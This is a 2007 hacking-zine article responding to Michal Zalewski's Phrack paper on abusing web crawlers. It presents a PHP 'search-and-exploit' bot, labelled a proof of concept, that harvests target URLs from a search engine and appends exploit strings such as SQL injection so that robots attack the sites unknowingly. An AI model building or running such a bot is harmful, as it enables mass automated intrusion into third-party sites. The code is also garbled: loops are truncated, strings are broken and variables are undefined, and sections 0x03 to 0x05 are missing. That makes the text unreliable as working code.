|  | 
Title: I, Bot. Taking advantage of robots power.
Re: "Against the System: Rise of the Robots" of Michal Zalewski
Author: Crossbower - crossbower#katamail.com
Site: http://www.playhack.net 
Date: 2007-04-18
---------------------------------------------------------------------------------
-[ SUMMARY ]---------------------------------------------------------------------
0x00: Intro, let's start
0x01: Abstract
0x02: Implementation
0x03: The code: Paranoid Android
0x04: Conclusion
---------------------------------------------------------------------------------
---[ 0x00: Intro, let's start ]
Hello to everybody. I'm very sorry for my poor english but it's not my
first language. I hope you will excuse eventual errors Wink
This paper wants to be a reply to an article published on Phrack by Michal Zalewski.
He was the first that has assumed the possibility to take advantage by multitude of
robots that every moment scanning the web to search information.
We begin with the introduction to the article of Zalewski, then will see how
implementing its ideas for writing ours bots.
"Consider a remote exploit that is able to compromise a remote system
without sending any attack code to his victim. Consider an exploit
which simply creates local file to compromise thousands of computers,
and which does not involve any local resources in the attack. Welcome to
the world of zero-effort exploit techniques. Welcome to the world of
automation, welcome to the world of anonymous, dramatically difficult
to stop attacks resulting from increasing Internet complexity.
Zero-effort exploits create their 'wishlist', and leave it somewhere
in cyberspace - can be even its home host, in the place where others
can find it. Others - Internet workers (see references, [D]) - hundreds
of never sleeping, endlessly browsing information crawlers, intelligent
agents, search engines... They come to pick this information, and -
unknowingly - to attack victims. You can stop one of them, but can't
stop them all. You can find out what their orders are, but you can't
guess what these orders will be tomorrow, hidden somewhere in the abyss
of not yet explored cyberspace.
Your private army, close at hand, picking orders you left for them
on their way. You exploit them without having to compromise them. They
do what they are designed for, and they do their best to accomplish it.
Welcome to the new reality, where our A.I. machines can rise against us."
Now we see as all this is possible in reality Wink Have fun!
-----------------------------------------------------------------------------[/]
---[ 0x01: Abstract ]
The idea that the search engines (first of all Google) could be transformed
in powerful arms in the hands of attackers is not new.
Google hacking, search dork, cache digging, are all techniques that allow
to take advantage of a minimal part of motors acquaintance, but a very few
persons, till now, had thought to use their more sensitive and powerful part,
the robot... and this is the topic of this article.
A robot is a program that automatically traverses the Web's hypertext structure
by retrieving pages or documents, and recursively retrieving all documents that
are referenced.
Note that "recursive" here doesn't limit the definition to any specific traversal
algorithm. Even if a robot applies some heuristic to the selection and order of
documents to visit and spaces out requests over a long space of time, it is still
a robot.
Normal Web browsers aren't robots, because they are operated by a human, and
don't automatically retrieve referenced documents.
Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders.
These names are a bit misleading because they give the impression the software itself
moves between sites like a virus. This not the case, a robot simply visits sites
by requesting documents from them.
What kinds of robots are there? Robots can be used for a number of purposes:
* Indexing
* HTML validation
* Link validation
* "What's New" monitoring
* Mirroring
How many robots circulate in the web?
For having a complete panoramic you can consult the list of active bot
(http://www.robotstxt.org/wc/active/html/type.html). 
We will not deepen because this argument does not belong to the article's
subject.
-----------------------------------------------------------------------------[/]
---[ 0x02: Implementation ]
Which are the force point of a bot?
Surely the speed, the ability to execute a great number of operations in a
little time..
For the exploiting we can write a bot with a function like mirroring,
that with the informations found in a database or in a search engine, can complete
mass penetrations without scanning a great number of useless targets.
A first (and simple) implementation is this script. It can search in a search
engine like google (or other..) and create an array with the addresses
of sites with determined web pages. If qualified, it can exploit automatically
many type of vulnerabilities (for example the sql injection).
Although it is a simple script can become a destructive arm used in the
mistaken way (ok noob?).
I ask therefore eventual readers lamer not to use it in order to damage. It's only
Proof of Concept.
- - - - -
    code:  - - - - -
    #!/usr/bin/php
    
    echo "
           --- Google Finder ---
     Automatic SaE (search-and-exploit) Bot
      by Crossbower 
 
    Automatic SaE (search-and-exploit) Bot  
  
    by Crossbower Crossbower*katamail*com 
    
    ";
    //Loading...
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);
    function SendPack($packet)
    {
      global $host, $port;
     
       $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
        }
       
      fputs($ock,$packet);
     
       $buffer='';
        while (!feof($ock)) {
          $buffer.=fgets($ock);
        }
     
      fclose($ock);
      return($buffer);
    }
    //START:
    /* Make and Send Query */
    $packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $html=SendPack($packet);
    //Open log file
    $handle =fopen($LogFile,'a');
    //Inizialize the log
    fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."
\n");
    fwrite($handle,"Visited by:
\n");
    $Spider =$REMOTE_HOST."
".$REMOTE_ADDR."
";
    $Spider.=$HTTP_USER_AGENT."
".$HTTP_REFERER."
";
    $Spider.=$HTTP_ACCEPT_LANGUAGE."
\n";
    fwrite($handle,$Spider);
    fwrite($handle,"Links (google cache):
\n");
    $Log ="$Log.="http://".$host.$SeCache; 
    //Find targets
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match); 
    for ($i=0; $i
\n";
       
       //Update log
       fwrite($handle,$Log.$match[1][$i].$exploit."\">".$match[1][$i].$exploit."
\n");
    }}
    //Close log
    fwrite($handle,"
\n");
    fclose($handle);
    ?>
    
    
    - - - - -
- - - - -
-----------------------------------------------------------------------------[/]
---[ 0x06: Conclusion ]
I hope these informations have interested to you and they have made you to
comprise the gravity of the possible attacks with robots, in future...
In order to deepen you can read these documents:
- "Against the System: Rise of the Robots" by Michal Zalewski
http://www.phrack.org/archives/57/p57-0x13 
- "The Anatomy of a Large-Scale Hypertextual Web Search Engine"
Googlebot concept, Sergey Brin, Lawrence Page, Stanford University
http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm 
- Proprietary web solutions security, Michal Zalewski
http://lcamtuf.coredump.cx/milpap.txt 
- "A Standard for Robot Exclusion", Martijn Koster
http://info.webcrawler.com/mak/projects/robots/norobots.html 
- "The Web Robots Database"
http://www.robotstxt.org/wc/active.html 
http://www.robotstxt.org/wc/active/html/type.html 
- "Web Security FAQ", Lincoln D. Stein
http://www.w3.org/Security/Faq/www-security-faq.html 
Ok, this is all people...
For clarifications, questions and other esitate to mail me Wink
Crossbower - crossbower#katamail.com
Site: http://www.playhack.net 
-----------------------------------------------------------------------------[/]